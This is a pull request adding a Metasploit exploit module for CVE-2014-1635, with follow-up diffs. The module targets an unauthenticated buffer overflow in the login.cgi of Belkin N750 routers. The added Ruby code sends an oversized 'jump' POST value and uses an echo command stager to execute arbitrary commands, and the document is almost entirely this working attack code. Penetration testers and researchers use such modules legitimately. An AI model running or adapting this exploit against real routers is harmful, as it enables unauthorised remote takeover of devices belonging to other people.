### PR TITLE
Belkin CVE-2014 1635

### DIFF
--- a/modules/exploits/linux/http/belkin_login_bof.rb
+++ b/modules/exploits/linux/http/belkin_login_bof.rb
@@ -1,0 +1,112 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Belkin login.cgi Buffer Overflow (minhttpd)',
+      'Description'    => %q{
+        This module exploits a remote buffer overflow vulnerability on several Belkin routers.
+        The vulnerability exists in the handling of HTTP queries to the login.cgi with
+        long jump values. The vulnerability can be exploitable without authentication.
+        This module was tested in an emulated environment only. Several Belkin routers with 
+        firmware 1.10.16.m are affected.
+      },
+      'Author'         =>
+        [
+          'Marco Vaz <mv[at]integrity.pt>', # Vulnerability discovery and initial Metasploit module (telnetd)
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module with echo stager
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['linux'],
+      'Arch'           => ARCH_MIPSLE,
+      'References'     =>
+        [
+          ['CVE', '2014-1635'],
+          ['EDB', '35184'],
+          ['BID', '70977'],
+          ['OSVDB', '114345'],
+          ['URL', 'https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/'], #advisory
+          ['URL', 'http://www.belkin.com/us/support-article?articleNum=4831'] #vendor site with update
+        ],
+      'Targets'        =>
+        [
+          [ 'Belkin Play N750 DB Wireless Dual-Band N+ Router, F9K1103,  firmware 1.10.16.m',
+            {
+              'Offset'      => 1379,
+            }
+          ]
+        ],
+      'DefaultOptions' => {
+        'RPORT'      => 8080
+      },
+      'DisclosureDate'  => 'May 09 2014',
+      'DefaultTarget'   => 0))
+      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => "/"
+      })
+
+      if res && [200, 301, 302].include?(res.code) and res.headers["Server"] and res.headers["Server"] =~ /minhttpd/ and res.body =~ /u_errpaswd/
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Accessing the vulnerable URL...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+    end
+
+    print_status("#{peer} - Exploiting...")
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 200,
+      :concat_operator => " %3b "
+    )
+  end
+
+  def prepare_shellcode(cmd)
+    shellcode = rand_text_alpha_upper(target['Offset'])                  # padding
+    shellcode << "e" << cmd
+    shellcode << "\n\n"
+  end
+
+  def execute_command(cmd, opts)
+    shellcode = prepare_shellcode(cmd)
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => "/login.cgi",
+        'encode_params' => false,
+        'vars_post' => {
+          'GO'      => '',
+          'jump'    => shellcode,
+        }
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end

--- a/modules/exploits/linux/http/belkin_login_bof.rb
+++ b/modules/exploits/linux/http/belkin_login_bof.rb
@@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
     execute_cmdstager(
       :flavor  => :echo,
       :linemax => 200,
-      :concat_operator => " %3b "
+      :concat_operator => " ; "
     )
   end
 
@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
       res = send_request_cgi({
         'method' => 'POST',
         'uri' => "/login.cgi",
-        'encode_params' => false,
+        'encode_params' => true,
         'vars_post' => {
           'GO'      => '',
           'jump'    => shellcode,

--- a/modules/exploits/linux/http/belkin_login_bof.rb
+++ b/modules/exploits/linux/http/belkin_login_bof.rb
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits a remote buffer overflow vulnerability on several Belkin routers.
         The vulnerability exists in the handling of HTTP queries to the login.cgi with
         long jump values. The vulnerability can be exploitable without authentication.
-        This module was tested in an emulated environment only. Several Belkin routers with 
+        This module was tested in an emulated environment only. Several Belkin routers with
         firmware 1.10.16.m are affected.
       },
       'Author'         =>


### PR DESCRIPTION
This is the exploit documented here [labs.integrity.pt!](https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/)

The following screenshot shows the exploit in an emulated environment:

![belkin-n750-exploit](https://cloud.githubusercontent.com/assets/497520/6636034/8ddcab78-c96c-11e4-8cd9-40dafe9f65c1.png)
